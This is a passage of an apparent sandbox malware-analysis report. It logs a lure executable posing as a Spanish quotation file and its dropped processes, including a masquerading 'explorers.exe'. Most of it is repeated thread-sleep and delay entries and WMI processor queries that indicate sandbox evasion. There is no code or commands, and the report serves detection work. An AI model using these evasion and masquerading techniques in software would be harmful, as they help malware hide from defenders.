                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -96184s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -96077s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -95965s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -95842s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -95733s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -95593s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -95483s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -95343s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -95222s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -95108s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -94988s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -94869s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -94746s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -99859s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -99750s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -99636s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -99509s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -99390s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -99281s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -99171s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -99062s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -98953s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -98842s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -98719s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -98583s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -98469s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exe TID: 5180Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\explorers.exe TID: 5164Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\AppData\Local\explorers.exe TID: 5164Thread sleep count: 42 > 30
                Source: C:\Users\user\AppData\Local\explorers.exe TID: 5060Thread sleep count: 9019 > 30
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 5312Thread sleep count: 9717 > 30
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -24903104499507879s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -200000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99825s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99677s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99370s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99250s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99139s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99031s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98922s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98812s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98703s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98589s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98471s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98180s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -97792s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -97665s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -97531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -97393s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -97203s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -96454s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -96290s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -96098s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -95970s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -95776s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -95658s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -95500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -95388s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -95260s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -95125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99872s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99746s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99638s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99530s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99390s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99265s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -99042s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98910s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98499s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98389s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98249s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98139s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -98031s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -97905s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 1248Thread sleep time: -97789s >= -30000s
                Source: C:\Users\user\AppData\Local\explorers.exe TID: 5628Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\AppData\Local\explorers.exe TID: 5628Thread sleep count: 45 > 30
                Source: C:\Users\user\AppData\Local\explorers.exe TID: 5632Thread sleep count: 9186 > 30
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 5940Thread sleep count: 8199 > 30
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -17524406870024063s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -200000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99871s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99761s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99655s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99546s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99327s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98997s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98825s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98587s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98423s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98296s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98158s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99780s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99436s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -99108s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98994s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98843s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98733s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98624s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98496s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98373s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98265s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98155s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -98046s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -97921s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -97812s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -97703s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -97577s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -97468s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe TID: 6048Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeWindow / User API: threadDelayed 9483
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9524
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeWindow / User API: threadDelayed 8822
                Source: C:\Users\user\AppData\Local\explorers.exeWindow / User API: threadDelayed 9019
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWindow / User API: threadDelayed 9717
                Source: C:\Users\user\AppData\Local\explorers.exeWindow / User API: threadDelayed 9186
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWindow / User API: threadDelayed 8199
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\cotizaci#U00f3n_y_dise#U00f1os_de_muestra.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 100000
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 99351
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 99197
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 99001
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 98881
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 98764
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 97333
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 97151
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 96985
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 96873
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 96760
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 96632
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 96487
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 96307
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 96184
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 96077
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 95965
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 95842
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 95733
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 95593
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 95483
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 95343
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 95222
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 95108
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 94988
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 94869
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 94746
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 99859
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 99750
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 99636
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 99509
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 99390
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 99281
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 99171
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 99062
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 98953
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 98842
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 98719
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 98583
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 98469
                Source: C:\Users\user\AppData\Local\Temp\Hxpqwdnjsynypvjkzfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 100000
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99825
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99677
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99500
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99370
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99250
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99139
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99031
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98922
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98812
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98703
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98589
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98471
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98180
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97792
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97665
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97531
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97393
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97203
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 96454
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 96290
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 96098
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 95970
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 95776
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 95658
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 95500
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 95388
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 95260
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 95125
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99872
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99746
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99638
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99530
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99390
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99265
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99156
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99042
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98910
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98750
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98625
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98499
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98389
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98249
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98139
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98031
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97905
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97789
                Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 100000
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99871
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99761
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99655
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99546
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99437
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99327
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99218
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99109
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98997
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98825
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98587
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98423
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98296
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 98158
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99890
                Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 99780
